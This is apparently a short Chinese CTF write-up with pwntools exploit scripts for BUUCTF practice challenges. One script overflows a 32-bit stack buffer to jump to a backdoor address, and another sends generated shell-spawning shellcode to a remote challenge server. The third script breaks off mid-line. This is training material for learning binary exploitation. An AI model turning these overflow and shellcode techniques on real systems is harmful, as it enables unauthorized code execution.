BUUCTF pwn水题大赏
wustctf2020_getshell
简单 32
位栈溢出。
exp:
from pwn import*
context.log_level = 'DEBUG'
p=remote('node3.buuoj.cn',28411)
#p=process('./wustctf2020_getshell')
backdoor = 0x0804851B
payload = 'a'*0x18+'a'*4+p32(backdoor)
p.sendline(payload)
#gdb.attach(p)
p.interactive()
mrctf2020_shellcode
简单 shellcode
。
exp:
from pwn import*
context(arch = 'amd64', os = 'linux', log_level = 'debug')
p=remote('node3.buuoj.cn',29856)
#p=process('./mrctf2020_shellcode')
elf=ELF('./mrctf2020_shellcode')
shellcode=asm(shellcraft.sh())
p.sendline(shellcode)
#gdb.attach(p)
p.interactive()
wustctf2020_getshell_2
32
位栈溢出
exp:
from pwn import*
context(arch='amd64',os='linux')
p=remote